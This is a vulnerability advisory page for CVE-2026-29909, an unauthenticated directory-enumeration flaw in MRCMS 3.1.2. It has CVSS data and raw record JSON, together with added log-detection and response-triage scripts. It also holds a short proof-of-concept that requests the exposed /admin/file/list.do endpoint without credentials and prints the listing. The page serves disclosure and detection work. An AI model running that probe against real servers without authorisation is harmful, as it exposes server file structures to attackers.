Security Vulnerability Report
CVE-2026-29909 CVSS 5.3 MEDIUM

CVE-2026-29909

Published: 2026-03-30 17:16:16
Last Modified: 2026-04-02 17:11:01

Description

MRCMS V3.1.2 contains an unauthenticated directory enumeration vulnerability in the file management module. The /admin/file/list.do endpoint lacks authentication controls and proper input validation, allowing remote attackers to enumerate directory contents on the server without any credentials. The record classifies the weakness as CWE-425 (Direct Request / Forced Browsing) and CWE-20 (Improper Input Validation); the CVSS vector describes a network-reachable, no-privilege, no-interaction information disclosure with low confidentiality impact and no integrity or availability impact.
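Because the endpoint path is fixed, hits to it can be picked out of ordinary web-server access logs. The following detection script is an added example, not part of this advisory or of MRCMS: it assumes the Apache/Nginx "combined" log format, normalises the request path so that forced-browsing variants (duplicate slashes, dot segments, percent- and double-percent-encoding) still match, and reports successful responses. The log lines in SAMPLE_LOG are constructed for illustration.

```python
"""Detection over web-server access logs for requests to the MRCMS
file-management endpoint named in CVE-2026-29909.

Added example; it is not part of the advisory or of MRCMS. It assumes the
Apache/Nginx "combined" log format. The log lines in SAMPLE_LOG are
constructed for illustration.
"""
import re
from urllib.parse import unquote

# Endpoint from the advisory. Paths are matched after normalisation so that
# forced-browsing variants (CWE-425) such as /admin//file/./list.do or a
# percent-encoded segment are not missed.
VULN_PATH = "/admin/file/list.do"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def normalize_path(target):
    """Return a canonical absolute path for a request target.

    Drops the query string, percent-decodes twice (double encoding is a
    common filter bypass), collapses empty and "." segments and resolves
    ".." without escaping the root.
    """
    path = target.split("?", 1)[0]
    path = unquote(unquote(path))
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = normalize_path(rec["target"])
    return rec


def find_hits(lines):
    """Return (ip, raw target, status) for successful requests to VULN_PATH.

    A 2xx on the unauthenticated endpoint is the signal; a 302 to the login
    page or a 401/403 means the request was refused and is not reported.
    Access logs carry no session state, so every hit, including those from
    legitimate administrators, should be cross-checked against application
    session logs.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == VULN_PATH and 200 <= rec["status"] < 300:
            hits.append((rec["ip"], rec["target"], rec["status"]))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Mar/2026:18:02:11 +0000] "GET /admin/file/list.do?path=/ HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Mar/2026:18:02:12 +0000] "GET /admin//file/./list.do HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [30/Mar/2026:18:05:40 +0000] "GET /admin/file/%6cist.do HTTP/1.1" 200 912 "-" "curl/8.4.0"',
    '192.0.2.9 - - [30/Mar/2026:18:06:01 +0000] "GET /index.do HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [30/Mar/2026:18:06:02 +0000] "GET /admin/file/list.do HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, target, status in find_hits(SAMPLE_LOG):
        print(f"{ip} -> {target} ({status})")
```

The 302 line is what a patched or correctly configured instance looks like (bounce to the login page) and is deliberately not reported; the three 200 lines, including the two obfuscated paths, are.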

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mrcms:mrcms:3.1.2:*:*:*:*:*:*:* - VULNERABLE
MRCMS V3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_vulnerability(target_url):
    """
    Checks for CVE-2026-29909 directory enumeration vulnerability.
    """
    # The vulnerable endpoint identified in the CVE description
    endpoint = "/admin/file/list.do"
    full_url = f"{target_url.rstrip('/')}{endpoint}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    try:
        # Sending request without authentication cookies
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            # A 200 on its own is a weak signal: some deployments serve the
            # login form at the requested URL with 200. Confirm that the body
            # is actually a directory listing before reporting the host.
            print(f"[+] Potential vulnerability detected at {full_url}")
            print(f"[+] Response content (first 200 chars): {response.text[:200]}")
        else:
            print(f"[-] Endpoint returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


# Usage example
# check_vulnerability("http://127.0.0.1:8080")
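The check above reports any 200, which produces false positives wherever the application answers the unauthenticated request with a login page rather than a redirect. The triage helper below is an added example, not code from the advisory, the PoC repository or MRCMS: it classifies a response by redirect target, authentication status codes and body shape, and only calls it a listing when the body parses as JSON carrying file-like records. The layout of a real MRCMS listing response is not documented on this page, so the JSON heuristic (records with a name/fileName/path key) is an assumption, and the sample bodies are constructed.

```python
"""Triage of a probe response for CVE-2026-29909.

Added example, not part of the advisory or of MRCMS. A 200 status alone does
not prove the endpoint is unauthenticated; this classifier looks at
redirects, authentication status codes and the body instead. The JSON
heuristic and the sample bodies below are assumptions/constructed data.
"""
import json

ENDPOINT = "/admin/file/list.do"
# Assumed key names for file records; adjust after observing a real response.
NAME_KEYS = ("name", "fileName", "filename", "path")


def extract_entries(data):
    """Collect dicts that look like file records anywhere inside parsed JSON."""
    found = []
    stack = [data]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            if any(k in node for k in NAME_KEYS):
                found.append(node)
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return found


def classify_response(status, headers, body):
    """Map a raw HTTP response to one of a few verdicts.

    listing            200 + JSON with file-like records: endpoint exposed
    login-page         200 but the body is an HTML login form: not confirmed
    redirect-to-login  3xx whose Location mentions login: auth enforced
    auth-enforced      401 / 403
    redirect / other / unknown   inspect manually
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    location = hdrs.get("location", "").lower()
    ctype = hdrs.get("content-type", "").lower()
    if status in (301, 302, 303, 307, 308):
        return "redirect-to-login" if "login" in location else "redirect"
    if status in (401, 403):
        return "auth-enforced"
    if status != 200:
        return "other"
    if "json" in ctype:
        try:
            data = json.loads(body)
        except ValueError:
            return "unknown"
        return "listing" if extract_entries(data) else "unknown"
    lower = body.lower()
    if "<form" in lower and ("password" in lower or "login" in lower):
        return "login-page"
    return "unknown"


def probe(target_url, timeout=10):
    """Send the unauthenticated request and classify the answer.

    Uses the third-party 'requests' package; redirects are not followed so
    that a bounce to the login page stays visible. Only run against systems
    you are authorised to test.
    """
    import requests  # imported here so the offline samples run without it
    url = target_url.rstrip("/") + ENDPOINT
    resp = requests.get(url, timeout=timeout, allow_redirects=False)
    return classify_response(resp.status_code, resp.headers, resp.text)


# Constructed sample responses (not captured from a real MRCMS instance).
LOGIN_HTML = (
    '<html><body><form action="/admin/login.do" method="post">'
    '<input name="username"><input type="password" name="password">'
    '</form></body></html>'
)
LISTING_JSON = json.dumps({
    "code": 0,
    "data": [{"name": "WEB-INF", "isDir": True},
             {"name": "config.properties", "size": 1234}],
})

if __name__ == "__main__":
    print(classify_response(200, {"Content-Type": "text/html"}, LOGIN_HTML))
    print(classify_response(200, {"Content-Type": "application/json"}, LISTING_JSON))
    print(classify_response(302, {"Location": "/admin/login.do"}, ""))
```

Only the "listing" verdict should be treated as confirmation; "login-page" and "redirect-to-login" are the two ways a host that still requires credentials typically answers, and the original 200-only check would have reported the first of them as vulnerable.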

References

https://github.com/qflksheep/CVE-2026-29909-MRCMS-vulnerability/blob/main/README.md (Exploit, Third Party Advisory)
https://github.com/wuweiit/mushroom (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29909", "sourceIdentifier": "[email protected]", "published": "2026-03-30T17:16:15.750", "lastModified": "2026-04-02T17:11:00.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MRCMS V3.1.2 contains an unauthenticated directory enumeration vulnerability in the file management module. The /admin/file/list.do endpoint lacks authentication controls and proper input validation, allowing remote attackers to enumerate directory contents on the server without any credentials."}, {"lang": "es", "value": "MRCMS V3.1.2 contiene una vulnerabilidad de enumeración de directorios no autenticada en el módulo de gestión de archivos. El endpoint /admin/file/list.do carece de controles de autenticación y de validación de entrada adecuada, lo que permite a atacantes remotos enumerar el contenido de los directorios en el servidor sin ninguna credencial."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mrcms:mrcms:3.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "254B64CD-32D5-4E91-8A4C-54C155EA7E0B"}]}]}], "references": [{"url": "https://github.com/qflksheep/CVE-2026-29909-MRCMS-vulnerability/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/wuweiit/mushroom", "source": "[email protected]", "tags": ["Product"]}]}}